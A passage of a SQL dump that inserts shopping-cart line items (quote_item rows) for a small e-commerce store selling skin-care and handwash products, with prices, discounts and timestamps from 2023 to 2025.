(113, 353, '2023-11-20 04:02:12', '2023-11-20 04:02:12', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2', NULL, 0, 0, 1.0000, 1.0000, 54.0000, 54.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(114, 354, '2023-11-20 04:04:53', '2023-11-20 04:04:53', 2064, 1, NULL, 0, 'New Spot', 'New Spot', NULL, '2', NULL, 0, 0, 100.0000, 1.0000, 111.0000, 111.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(115, 355, '2023-11-20 04:18:38', '2023-11-20 04:18:38', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2', NULL, 0, 0, 1.0000, 1.0000, 54.0000, 54.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(116, 356, '2023-11-20 04:45:50', '2023-11-20 04:45:50', 2064, 1, NULL, 0, 'New Spot', 'New Spot', NULL, '2', NULL, 0, 0, 100.0000, 1.0000, 111.0000, 111.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(117, 366, '2023-12-15 15:09:38', '2023-12-15 15:09:38', 2060, 1, NULL, 0, 'GH786', 'Face Wash Ornamental lemon extract', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 421.0000, 421.0000, NULL, 20.0000, 84.2000, 84.2000, 0.0000, 0.0000, 0.0000, 421.0000, 421.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 421.0000, 421.0000, 421.0000, 421.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(118, 367, '2023-12-19 09:58:31', '2023-12-19 09:58:31', 2063, 1, NULL, 0, 'Ramy Mesta Guard Face', 'Ramy Mesta Guard Face', NULL, '2,3', NULL, 0, 0, NULL, 1.0000, 643.0000, 643.0000, NULL, 20.0000, 128.6000, 128.6000, 0.0000, 0.0000, 0.0000, 643.0000, 643.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 643.0000, 643.0000, 643.0000, 643.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(119, 369, '2023-12-31 16:54:02', '2023-12-31 16:54:02', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2', NULL, 0, 0, 1.0000, 1.0000, 54.0000, 54.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(120, 370, '2023-12-31 16:54:16', '2023-12-31 16:54:16', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2', NULL, 0, 0, 1.0000, 1.0000, 54.0000, 54.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(121, 371, '2023-12-31 16:54:27', '2023-12-31 16:54:27', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2', NULL, 0, 0, 1.0000, 1.0000, 54.0000, 54.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(122, 372, '2023-12-31 16:54:40', '2023-12-31 16:54:40', 2064, 1, NULL, 0, 'New Spot', 'New Spot', NULL, '2', NULL, 0, 0, 100.0000, 1.0000, 111.0000, 111.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL);
INSERT INTO `quote_item` (`item_id`, `quote_id`, `created_at`, `updated_at`, `product_id`, `store_id`, `parent_item_id`, `is_virtual`, `sku`, `name`, `description`, `applied_rule_ids`, `additional_data`, `is_qty_decimal`, `no_discount`, `weight`, `qty`, `price`, `base_price`, `custom_price`, `discount_percent`, `discount_amount`, `base_discount_amount`, `tax_percent`, `tax_amount`, `base_tax_amount`, `row_total`, `base_row_total`, `row_total_with_discount`, `row_weight`, `product_type`, `base_tax_before_discount`, `tax_before_discount`, `original_custom_price`, `redirect_url`, `base_cost`, `price_incl_tax`, `base_price_incl_tax`, `row_total_incl_tax`, `base_row_total_incl_tax`, `discount_tax_compensation_amount`, `base_discount_tax_compensation_amount`, `gift_message_id`, `free_shipping`, `weee_tax_applied`, `weee_tax_applied_amount`, `weee_tax_applied_row_amount`, `weee_tax_disposition`, `weee_tax_row_disposition`, `base_weee_tax_applied_amount`, `base_weee_tax_applied_row_amnt`, `base_weee_tax_disposition`, `base_weee_tax_row_disposition`) VALUES
(123, 373, '2023-12-31 16:54:55', '2023-12-31 16:54:55', 2064, 1, NULL, 0, 'New Spot', 'New Spot', NULL, '2', NULL, 0, 0, 100.0000, 1.0000, 111.0000, 111.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(124, 375, '2024-01-06 10:19:58', '2024-01-06 10:19:58', 2064, 1, NULL, 0, 'New Spot', 'New Spot', NULL, '2', NULL, 0, 0, 100.0000, 1.0000, 111.0000, 111.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(125, 376, '2024-01-13 05:36:16', '2024-01-13 05:36:16', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2', NULL, 0, 0, 1.0000, 1.0000, 54.0000, 54.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(126, 378, '2024-01-13 05:36:16', '2024-01-13 05:36:16', 2064, 1, NULL, 0, 'New Spot', 'New Spot', NULL, '2', NULL, 0, 0, 100.0000, 1.0000, 111.0000, 111.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(127, 380, '2024-01-13 05:36:16', '2024-01-13 05:36:16', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2', NULL, 0, 0, 1.0000, 1.0000, 54.0000, 54.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(128, 379, '2024-01-13 05:36:16', '2024-01-13 05:36:16', 2064, 1, NULL, 0, 'New Spot', 'New Spot', NULL, '2', NULL, 0, 0, 100.0000, 1.0000, 111.0000, 111.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(129, 377, '2024-01-13 05:36:16', '2024-01-13 05:36:16', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2', NULL, 0, 0, 1.0000, 1.0000, 54.0000, 54.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(130, 383, '2024-02-02 08:44:49', '2024-02-02 08:44:49', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2', NULL, 0, 0, 1.0000, 1.0000, 54.0000, 54.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(131, 384, '2024-02-03 05:47:56', '2024-02-03 05:47:56', 2060, 1, NULL, 0, 'GH786', 'Face Wash Ornamental lemon extract', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 421.0000, 421.0000, NULL, 20.0000, 84.2000, 84.2000, 0.0000, 0.0000, 0.0000, 421.0000, 421.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 421.0000, 421.0000, 421.0000, 421.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(132, 385, '2024-02-03 13:15:09', '2024-02-03 13:15:09', 2060, 1, NULL, 0, 'GH786', 'Face Wash Ornamental lemon extract', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 421.0000, 421.0000, NULL, 20.0000, 84.2000, 84.2000, 0.0000, 0.0000, 0.0000, 421.0000, 421.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 421.0000, 421.0000, 421.0000, 421.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(133, 389, '2024-02-28 04:29:23', '2024-02-28 04:29:23', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2', NULL, 0, 0, 1.0000, 1.0000, 54.0000, 54.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(134, 397, '2024-04-19 02:11:21', '2024-04-19 02:11:21', 2060, 1, NULL, 0, 'GH786', 'Face Wash Ornamental lemon extract', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 421.0000, 421.0000, NULL, 20.0000, 84.2000, 84.2000, 0.0000, 0.0000, 0.0000, 421.0000, 421.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 421.0000, 421.0000, 421.0000, 421.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(135, 398, '2024-04-19 09:52:41', '2024-04-19 09:52:41', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2', NULL, 0, 0, 1.0000, 1.0000, 54.0000, 54.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(136, 399, '2024-04-26 14:35:22', '2024-04-26 14:35:22', 2063, 1, NULL, 0, 'Ramy Mesta Guard Face', 'Ramy Mesta Guard Face', NULL, '2,3', NULL, 0, 0, NULL, 1.0000, 643.0000, 643.0000, NULL, 20.0000, 128.6000, 128.6000, 0.0000, 0.0000, 0.0000, 643.0000, 643.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 643.0000, 643.0000, 643.0000, 643.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(137, 401, '2024-05-04 04:53:41', '2024-05-04 04:53:41', 2060, 1, NULL, 0, 'GH786', 'Face Wash Ornamental lemon extract', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 421.0000, 421.0000, NULL, 20.0000, 84.2000, 84.2000, 0.0000, 0.0000, 0.0000, 421.0000, 421.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 421.0000, 421.0000, 421.0000, 421.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(138, 402, '2024-05-21 09:03:34', '2024-05-21 09:03:34', 2060, 1, NULL, 0, 'GH786', 'Face Wash Ornamental lemon extract', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 421.0000, 421.0000, NULL, 20.0000, 84.2000, 84.2000, 0.0000, 0.0000, 0.0000, 421.0000, 421.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 421.0000, 421.0000, 421.0000, 421.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(139, 403, '2024-06-05 13:39:59', '2024-06-05 13:39:59', 2060, 1, NULL, 0, 'GH786', 'Face Wash Ornamental lemon extract', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 421.0000, 421.0000, NULL, 20.0000, 84.2000, 84.2000, 0.0000, 0.0000, 0.0000, 421.0000, 421.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 421.0000, 421.0000, 421.0000, 421.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(140, 405, '2024-07-30 16:51:39', '2024-07-30 16:51:39', 2054, 1, NULL, 0, 'FF44', 'G clean Handwash Liquid Soap Pump 200ml   200.00 ৳ ', NULL, NULL, NULL, 0, 0, 0.0000, 1.0000, 32.0000, 32.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(141, 407, '2024-07-31 19:35:08', '2024-07-31 19:35:08', 2054, 1, NULL, 0, 'FF44', 'G clean Handwash Liquid Soap Pump 200ml   200.00 ৳ ', NULL, NULL, NULL, 0, 0, 0.0000, 1.0000, 32.0000, 32.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(142, 408, '2024-08-01 03:13:41', '2024-08-01 03:13:41', 2054, 1, NULL, 0, 'FF44', 'G clean Handwash Liquid Soap Pump 200ml   200.00 ৳ ', NULL, NULL, NULL, 0, 0, 0.0000, 1.0000, 32.0000, 32.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(143, 409, '2024-08-01 05:17:17', '2024-08-01 05:17:17', 2054, 1, NULL, 0, 'FF44', 'G clean Handwash Liquid Soap Pump 200ml   200.00 ৳ ', NULL, NULL, NULL, 0, 0, 0.0000, 1.0000, 32.0000, 32.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(144, 410, '2024-08-02 02:07:19', '2024-08-02 02:07:19', 2054, 1, NULL, 0, 'FF44', 'G clean Handwash Liquid Soap Pump 200ml   200.00 ৳ ', NULL, NULL, NULL, 0, 0, 0.0000, 1.0000, 32.0000, 32.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(145, 411, '2024-08-02 04:20:12', '2024-08-02 04:20:12', 2054, 1, NULL, 0, 'FF44', 'G clean Handwash Liquid Soap Pump 200ml   200.00 ৳ ', NULL, NULL, NULL, 0, 0, 0.0000, 1.0000, 32.0000, 32.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(146, 412, '2024-08-02 12:15:18', '2024-08-02 12:15:18', 2054, 1, NULL, 0, 'FF44', 'G clean Handwash Liquid Soap Pump 200ml   200.00 ৳ ', NULL, NULL, NULL, 0, 0, 0.0000, 1.0000, 32.0000, 32.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(147, 413, '2024-08-02 14:52:58', '2024-08-02 14:52:58', 2054, 1, NULL, 0, 'FF44', 'G clean Handwash Liquid Soap Pump 200ml   200.00 ৳ ', NULL, NULL, NULL, 0, 0, 0.0000, 1.0000, 32.0000, 32.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(148, 414, '2024-08-03 09:44:06', '2024-08-03 09:44:06', 2054, 1, NULL, 0, 'FF44', 'G clean Handwash Liquid Soap Pump 200ml   200.00 ৳ ', NULL, NULL, NULL, 0, 0, 0.0000, 1.0000, 32.0000, 32.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(149, 415, '2024-08-03 17:46:05', '2024-08-03 17:46:05', 2059, 1, NULL, 0, 'HGF64', 'Face Wash Ornamental lemon extract', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 422.0000, 422.0000, NULL, 20.0000, 84.4000, 84.4000, 0.0000, 0.0000, 0.0000, 422.0000, 422.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 422.0000, 422.0000, 422.0000, 422.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(150, 416, '2024-08-04 00:26:19', '2024-08-04 00:26:19', 2054, 1, NULL, 0, 'FF44', 'G clean Handwash Liquid Soap Pump 200ml   200.00 ৳ ', NULL, NULL, NULL, 0, 0, 0.0000, 1.0000, 32.0000, 32.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(151, 417, '2024-08-05 17:42:23', '2024-08-05 17:42:23', 2054, 1, NULL, 0, 'FF44', 'G clean Handwash Liquid Soap Pump 200ml   200.00 ৳ ', NULL, NULL, NULL, 0, 0, 0.0000, 1.0000, 32.0000, 32.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(152, 418, '2024-08-06 13:49:16', '2024-08-06 13:49:16', 2054, 1, NULL, 0, 'FF44', 'G clean Handwash Liquid Soap Pump 200ml   200.00 ৳ ', NULL, NULL, NULL, 0, 0, 0.0000, 1.0000, 32.0000, 32.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(153, 419, '2024-08-09 09:33:01', '2024-08-09 09:33:01', 2054, 1, NULL, 0, 'FF44', 'G clean Handwash Liquid Soap Pump 200ml   200.00 ৳ ', NULL, NULL, NULL, 0, 0, 0.0000, 1.0000, 32.0000, 32.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(154, 420, '2024-08-13 03:37:28', '2024-08-13 03:37:28', 2054, 1, NULL, 0, 'FF44', 'G clean Handwash Liquid Soap Pump 200ml   200.00 ৳ ', NULL, NULL, NULL, 0, 0, 0.0000, 1.0000, 32.0000, 32.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(155, 421, '2024-08-14 00:23:27', '2024-08-14 00:23:27', 2054, 1, NULL, 0, 'FF44', 'G clean Handwash Liquid Soap Pump 200ml   200.00 ৳ ', NULL, NULL, NULL, 0, 0, 0.0000, 1.0000, 32.0000, 32.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(156, 422, '2024-08-15 06:29:44', '2024-08-15 06:29:44', 2054, 1, NULL, 0, 'FF44', 'G clean Handwash Liquid Soap Pump 200ml   200.00 ৳ ', NULL, NULL, NULL, 0, 0, 0.0000, 1.0000, 32.0000, 32.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(157, 423, '2024-08-19 18:43:50', '2024-08-19 18:43:50', 2054, 1, NULL, 0, 'FF44', 'G clean Handwash Liquid Soap Pump 200ml   200.00 ৳ ', NULL, NULL, NULL, 0, 0, 0.0000, 1.0000, 32.0000, 32.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(158, 429, '2024-10-09 08:33:07', '2024-10-09 08:33:07', 2063, 1, NULL, 0, 'Ramy Mesta Guard Face', 'Ramy Mesta Guard Face', NULL, '2,3', NULL, 0, 0, NULL, 1.0000, 643.0000, 643.0000, NULL, 20.0000, 128.6000, 128.6000, 0.0000, 0.0000, 0.0000, 643.0000, 643.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 643.0000, 643.0000, 643.0000, 643.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(159, 437, '2025-01-28 07:29:49', '2025-01-28 07:29:49', 2064, 1, NULL, 0, 'New Spot', 'New Spot', NULL, '2', NULL, 0, 0, 100.0000, 1.0000, 111.0000, 111.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(160, 438, '2025-01-28 07:30:20', '2025-01-28 07:30:20', 2064, 1, NULL, 0, 'New Spot', 'New Spot', NULL, '2', NULL, 0, 0, 100.0000, 1.0000, 111.0000, 111.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(161, 439, '2025-01-28 07:30:49', '2025-01-28 07:30:49', 2064, 1, NULL, 0, 'New Spot', 'New Spot', NULL, '2', NULL, 0, 0, 100.0000, 1.0000, 111.0000, 111.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(162, 440, '2025-01-28 07:31:15', '2025-01-28 07:31:15', 2064, 1, NULL, 0, 'New Spot', 'New Spot', NULL, '2', NULL, 0, 0, 100.0000, 1.0000, 111.0000, 111.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
